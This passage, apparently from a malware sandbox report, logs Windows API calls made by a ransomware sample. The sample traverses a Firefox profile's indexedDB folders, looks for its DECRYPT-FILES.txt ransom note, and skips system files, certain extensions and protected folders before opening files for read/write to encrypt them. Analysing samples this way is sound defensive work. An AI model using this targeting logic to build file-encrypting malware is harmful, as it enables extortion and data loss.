HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\\\0a16c9.tmp") returned 109 [0184.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0184.237] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0184.237] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.237] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\\\DECRYPT-FILES.txt") returned 116 [0184.237] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.237] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0184.237] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*" [0184.237] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf084fd20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf084fd20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0184.242] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.242] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf084fd20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf084fd20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.242] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.242] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.242] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf084fd20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf084fd20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf084fd20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.242] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.242] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.242] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.242] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.242] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.242] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.242] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.242] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.243] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.243] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.243] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.243] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.243] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.243] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.243] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.243] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0184.243] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.243] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0184.243] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\0a16c9.tmp" [0184.243] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.243] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.243] CloseHandle (hObject=0x0) returned 0 [0184.243] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.244] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac8cb860, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.244] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.244] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 1 [0184.244] lstrcmpW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0184.244] lstrcmpW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0184.244] lstrcatW (in: lpString1="moz-safe-about+home", lpString2="\\" | out: lpString1="moz-safe-about+home\\") returned="moz-safe-about+home\\" [0184.244] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\Program Files") returned 0x0 [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch=":\\Windows") returned 0x0 [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\Games\\") returned 0x0 [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\All Users") returned 0x0 [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="AhnLab") returned 0x0 [0184.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.244] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0184.292] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.292] wsprintfW (in: param_1=0x36fdb84, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\\\0a16c9.tmp") returned 129 [0184.292] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x28c [0184.356] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0184.356] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.356] wsprintfW (in: param_1=0x36fdb84, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\\\DECRYPT-FILES.txt") returned 136 [0184.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.401] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0184.401] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*" [0184.401] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*", lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0980820, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0980820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479a38 [0184.401] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.401] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0980820, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0980820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.401] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.401] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.401] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".metadata", cAlternateFileName="METADA~1")) returned 1 [0184.401] lstrcmpiW (lpString1=".metadata", lpString2="DECRYPT-FILES.txt") returned -1 [0184.401] lstrcmpiW (lpString1=".metadata", lpString2="autorun.inf") returned -1 [0184.401] lstrcmpiW (lpString1=".metadata", lpString2="boot.ini") returned -1 [0184.401] lstrcmpiW (lpString1=".metadata", lpString2="desktop.ini") returned -1 [0184.401] lstrcmpiW (lpString1=".metadata", lpString2="ntuser.dat") returned -1 [0184.401] lstrcmpiW (lpString1=".metadata", lpString2="iconcache.db") returned -1 [0184.401] lstrcmpiW (lpString1=".metadata", lpString2="bootsect.bak") returned -1 [0184.401] lstrcmpiW (lpString1=".metadata", lpString2="ntuser.dat.log") returned -1 [0184.401] lstrcmpiW (lpString1=".metadata", lpString2="thumbs.db") returned -1 [0184.401] lstrcmpiW (lpString1=".metadata", lpString2="Bootfont.bin") returned -1 [0184.401] lstrlenW (lpString=".metadata") returned 9 [0184.402] lstrcmpiW (lpString1="metadata", lpString2="lnk") returned 1 [0184.402] lstrcmpiW (lpString1="metadata", lpString2="exe") returned 1 [0184.402] lstrcmpiW (lpString1="metadata", lpString2="sys") returned -1 [0184.402] lstrcmpiW (lpString1="metadata", lpString2="dll") returned 1 [0184.402] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0184.402] lstrlenW (lpString=".metadata") returned 9 [0184.402] lstrcpyW (in: lpString1=0x36fdb74, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0184.402] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2=".metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" [0184.402] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.402] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x294 [0184.419] GetFileSizeEx (in: hFile=0x294, lpFileSize=0x36fd340 | out: lpFileSize=0x36fd340*=0) returned 1 [0184.419] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0184.419] CloseHandle (hObject=0x0) returned 0 [0184.419] CloseHandle (hObject=0x294) returned 1 [0184.420] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.420] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf0980820, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0980820, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0980820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.420] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.420] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.420] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.420] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.420] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.420] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.420] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.420] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.420] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.420] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.420] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.420] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.420] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.420] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.420] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.420] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0184.420] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.420] lstrcpyW (in: lpString1=0x36fdb74, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0184.420] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\0a16c9.tmp" [0184.420] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.421] CloseHandle (hObject=0x0) returned 0 [0184.421] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.421] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac8cb860, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.421] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.421] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xacb52fc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xacb52fc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 1 [0184.421] lstrcmpW (lpString1="idb", lpString2=".") returned 1 [0184.421] lstrcmpW (lpString1="idb", lpString2="..") returned 1 [0184.421] lstrcatW (in: lpString1="idb", lpString2="\\" | out: lpString1="idb\\") returned="idb\\" [0184.421] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS 